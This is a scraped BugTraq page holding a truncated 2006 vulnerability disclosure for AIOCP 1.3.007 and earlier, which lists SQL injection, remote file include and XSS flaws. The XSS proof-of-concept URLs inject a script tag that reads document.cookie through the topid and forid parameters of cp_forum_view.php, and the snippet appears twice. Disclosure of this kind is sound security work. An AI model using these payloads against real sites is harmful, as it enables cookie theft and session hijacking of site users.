BugTraq
Back to list
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
AIOCP <=1.3.007 multiples vulnerabilities [sql , remote file include , xss]
Nov 06 2006 06:37AM
saps audit gmail com
AIOCP <=1.3.007 multiples vulnerabilities[injection sql , remote file include , xss]
XSS get =
- /public/code/cp_forum_view.php?fmode=top&topid=</textarea>'"><script>ale
rt(document.cookie)</script>
- /public/code/cp_forum_view.php?fmode=top&topid=53&forid=</textarea>'"><s
cript>alert(document.cooki...
[ more ]
Privacy Statement
Copyright 2010, SecurityFocus
XSS get =
- /public/code/cp_forum_view.php?fmode=top&topid=</textarea>'"><script>ale
rt(document.cookie)</script>
- /public/code/cp_forum_view.php?fmode=top&topid=53&forid=</textarea>'"><s
cript>alert(document.cooki...
[ more ]